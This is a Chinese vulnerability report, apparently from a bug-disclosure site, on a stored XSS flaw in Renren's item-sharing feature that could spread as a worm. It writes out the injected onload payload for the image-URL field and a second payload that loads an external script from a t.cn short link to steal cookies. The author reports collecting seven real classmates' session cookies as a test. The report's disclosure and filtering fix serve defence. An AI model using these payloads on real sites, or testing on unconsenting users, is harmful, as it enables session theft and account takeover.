人人网XSS造成强力蠕虫,这回不跨GG了,只要加我好友,一开人人就中招。这要是传播起来- -杠杠的。 首先上图吧,最严重的两个 这是在人人网个人首页中, 还有一个是在人人逛街的首页中- -如果我的推荐出现在了主页中,在这个时候进入人人逛街主页的人全都会被蠕虫攻击。 还有两处 在个人主页以及个人专辑中、在推荐详情中: 看到这里估计已经知道出事地点是哪了。就是人人逛街的[分享宝贝]。 下面是实现过程: 首先[分享宝贝]到淘宝上随便选一个宝贝分享过来 通过验证后 在点发布前对包进行拦截,可以看到这样一个包 其中的pics中有四张图片: http%3A%2F%2Ffmn.rrimg测试数据%2Ffmn065%2Fgouwu%2F20120831%2F0320%2Flarge_x9G9_29d50000ad81118d.jpg" onload="alert(1898)"%3Ft%3Dlarge%26w%3D450%26h%3D450%2Chttp%3A%2F%2Ffmn.rrimg测试数据%2Ffmn065%2Fgouwu%2F20120831%2F0320%2Fmain1_x9G9_29d50000ad81118d.jpg" onload="alert(1898)"%3Ft%3Dmain1%26w%3D320%26h%3D320%2Chttp%3A%2F%2Ffmn.rrimg测试数据%2Ffmn065%2Fgouwu%2F20120831%2F0320%2Fmain2_x9G9_29d50000ad81118d.jpg" onload="alert(1898)"%3Ft%3Dmain2%26w%3D210%26h%3D210%2Chttp%3A%2F%2Ffmn.rrimg测试数据%2Ffmn065%2Fgouwu%2F20120831%2F0320%2Fhead_x9G9_29d50000ad81118d.jpg" onload="alert(1898)"%3Ft%3Dhead%26w%3D100%26h%3D100 在每张图片末尾都加上" onload="alert(1898)" 然后就不论是在小图 中图 大图中,,都能被跨到了- - 为了进一步测试威力我将代码换成了:HdhCmsTest2cto测试数据 " onload="document.write('<script/src=http://t.cn/zW1EqRD></script>')" 然后等了40分钟 一共有我7位可爱的同学将他们的COOKIE传给了我= = (duapp因为设置了啥映射,所以只能获取到本地IP = =) 可见在人人主页跨起来还是很给力的- -。。。 我一分享新东西就帮我在主页发出去了- - 我觉得我就不用吧蠕虫代码贴出来了- -,到这里危害已经很明显了- - 求给力啊。 修复方案: 问题很多,不止我提交的这一个,不过大部分都差不多,过滤干净就行。
查看更多关于人人网XSS造成强力蠕虫,只要加好友一开人人就的详细内容...